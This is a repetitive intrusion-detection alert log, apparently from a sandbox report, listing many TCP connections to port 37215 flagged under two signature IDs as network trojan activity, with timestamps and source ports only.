                Timestamp:06/14/24-10:44:16.716875
                SID:2829579
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177242
                SID:2829579
                Source Port:52566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788829
                SID:2835222
                Source Port:41544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763106
                SID:2829579
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761638
                SID:2829579
                Source Port:52052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917975
                SID:2829579
                Source Port:60596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145730
                SID:2829579
                Source Port:49962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813131
                SID:2835222
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031245
                SID:2835222
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017586
                SID:2835222
                Source Port:49968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034375
                SID:2835222
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342296
                SID:2835222
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916319
                SID:2829579
                Source Port:50532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502801
                SID:2835222
                Source Port:39320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292019
                SID:2835222
                Source Port:39702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898449
                SID:2829579
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546409
                SID:2829579
                Source Port:38474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244960
                SID:2835222
                Source Port:60798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932538
                SID:2829579
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412181
                SID:2829579
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941474
                SID:2829579
                Source Port:58502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367859
                SID:2835222
                Source Port:55504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999543
                SID:2829579
                Source Port:46456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134472
                SID:2829579
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033228
                SID:2835222
                Source Port:58282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022088
                SID:2829579
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669129
                SID:2829579
                Source Port:39542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984505
                SID:2835222
                Source Port:34686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074789
                SID:2835222
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146419
                SID:2829579
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421079
                SID:2835222
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944413
                SID:2835222
                Source Port:57928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970776
                SID:2835222
                Source Port:43488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809402
                SID:2829579
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074374
                SID:2835222
                Source Port:58308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131918
                SID:2829579
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133291
                SID:2835222
                Source Port:60646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022140
                SID:2835222
                Source Port:38092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716667
                SID:2829579
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662112
                SID:2829579
                Source Port:47910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056095
                SID:2835222
                Source Port:52356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368441
                SID:2829579
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979535
                SID:2829579
                Source Port:60770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788987
                SID:2829579
                Source Port:42904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051268
                SID:2835222
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788788
                SID:2829579
                Source Port:48954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625125
                SID:2829579
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614141
                SID:2835222
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340827
                SID:2835222
                Source Port:42870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673080
                SID:2829579
                Source Port:37732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243888
                SID:2829579
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544052
                SID:2835222
                Source Port:45684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779963
                SID:2829579
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094696
                SID:2835222
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337076
                SID:2829579
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228566
                SID:2829579
                Source Port:37970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992494
                SID:2829579
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148184
                SID:2835222
                Source Port:40870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858423
                SID:2829579
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224673
                SID:2829579
                Source Port:33590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293020
                SID:2835222
                Source Port:37400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421725
                SID:2835222
                Source Port:50730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941027
                SID:2829579
                Source Port:46950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563956
                SID:2835222
                Source Port:51312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547319
                SID:2835222
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336046
                SID:2829579
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133822
                SID:2835222
                Source Port:44670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368318
                SID:2835222
                Source Port:39002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450824
                SID:2835222
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812367
                SID:2835222
                Source Port:60090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503100
                SID:2829579
                Source Port:56878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023878
                SID:2835222
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034677
                SID:2835222
                Source Port:44516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984540
                SID:2835222
                Source Port:46646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183671
                SID:2835222
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452516
                SID:2829579
                Source Port:54216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791733
                SID:2829579
                Source Port:50916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883013
                SID:2835222
                Source Port:54104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014485
                SID:2829579
                Source Port:59998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548523
                SID:2835222
                Source Port:38772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760565
                SID:2835222
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294188
                SID:2829579
                Source Port:56502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859551
                SID:2829579
                Source Port:32840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019223
                SID:2829579
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760932
                SID:2829579
                Source Port:45450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023985
                SID:2835222
                Source Port:33800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662590
                SID:2835222
                Source Port:53572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846984
                SID:2829579
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075270
                SID:2829579
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132271
                SID:2829579
                Source Port:34112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323589
                SID:2835222
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410149
                SID:2835222
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766958
                SID:2829579
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111492
                SID:2829579
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549294
                SID:2835222
                Source Port:55500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807392
                SID:2835222
                Source Port:52972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733666
                SID:2835222
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977251
                SID:2829579
                Source Port:56402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850390
                SID:2829579
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789508
                SID:2835222
                Source Port:43362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134331
                SID:2835222
                Source Port:34778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678262
                SID:2829579
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761745
                SID:2835222
                Source Port:40492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321301
                SID:2835222
                Source Port:50460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860151
                SID:2835222
                Source Port:40790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762525
                SID:2835222
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969482
                SID:2829579
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662475
                SID:2829579
                Source Port:47124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245712
                SID:2829579
                Source Port:57146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176532
                SID:2835222
                Source Port:41110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672619
                SID:2829579
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274505
                SID:2835222
                Source Port:52276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640789
                SID:2835222
                Source Port:54070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023803
                SID:2835222
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766810
                SID:2835222
                Source Port:57810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980588
                SID:2835222
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968268
                SID:2829579
                Source Port:59268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412083
                SID:2835222
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011485
                SID:2835222
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078671
                SID:2835222
                Source Port:41008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564043
                SID:2835222
                Source Port:53968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779842
                SID:2835222
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808154
                SID:2835222
                Source Port:58100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323969
                SID:2835222
                Source Port:34862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879002
                SID:2829579
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947363
                SID:2829579
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111133
                SID:2829579
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966166
                SID:2829579
                Source Port:51314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547420
                SID:2829579
                Source Port:54156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777075
                SID:2835222
                Source Port:56408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504762
                SID:2829579
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668801
                SID:2829579
                Source Port:38236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184790
                SID:2835222
                Source Port:47542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404652
                SID:2829579
                Source Port:37616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013178
                SID:2829579
                Source Port:43462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115692
                SID:2829579
                Source Port:51458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366111
                SID:2829579
                Source Port:56404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422923
                SID:2835222
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161440
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968335
                SID:2835222
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846277
                SID:2835222
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185751
                SID:2835222
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718951
                SID:2835222
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879361
                SID:2829579
                Source Port:38554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020565
                SID:2835222
                Source Port:52572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997077
                SID:2835222
                Source Port:55818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715267
                SID:2829579
                Source Port:40816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025856
                SID:2835222
                Source Port:41128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027057
                SID:2829579
                Source Port:55464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229974
                SID:2829579
                Source Port:57412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149515
                SID:2835222
                Source Port:56758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763051
                SID:2835222
                Source Port:40386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013316
                SID:2835222
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073723
                SID:2835222
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132808
                SID:2829579
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618204
                SID:2829579
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018561
                SID:2829579
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723714
                SID:2829579
                Source Port:60640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146341
                SID:2829579
                Source Port:39514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072963
                SID:2829579
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452220
                SID:2835222
                Source Port:58338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012982
                SID:2829579
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089840
                SID:2829579
                Source Port:34752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275811
                SID:2829579
                Source Port:41820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027645
                SID:2829579
                Source Port:35336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717057
                SID:2835222
                Source Port:36126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641077
                SID:2835222
                Source Port:54686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159837
                SID:2835222
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160215
                SID:2835222
                Source Port:48930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016364
                SID:2835222
                Source Port:33714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021975
                SID:2835222
                Source Port:39548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668740
                SID:2829579
                Source Port:45148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229925
                SID:2835222
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766637
                SID:2829579
                Source Port:38114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776647
                SID:2835222
                Source Port:52436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685361
                SID:2835222
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761300
                SID:2835222
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882836
                SID:2829579
                Source Port:37016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079391
                SID:2835222
                Source Port:33248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762537
                SID:2829579
                Source Port:45706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294871
                SID:2829579
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967774
                SID:2835222
                Source Port:49182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980528
                SID:2829579
                Source Port:56918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503189
                SID:2829579
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759223
                SID:2829579
                Source Port:35992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133396
                SID:2835222
                Source Port:45670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906451
                SID:2829579
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564897
                SID:2835222
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617590
                SID:2835222
                Source Port:45102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934424
                SID:2829579
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027342
                SID:2835222
                Source Port:35204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717636
                SID:2829579
                Source Port:44494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701326
                SID:2829579
                Source Port:33550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791352
                SID:2835222
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806991
                SID:2835222
                Source Port:39120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292019
                SID:2829579
                Source Port:39702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277689
                SID:2835222
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943811
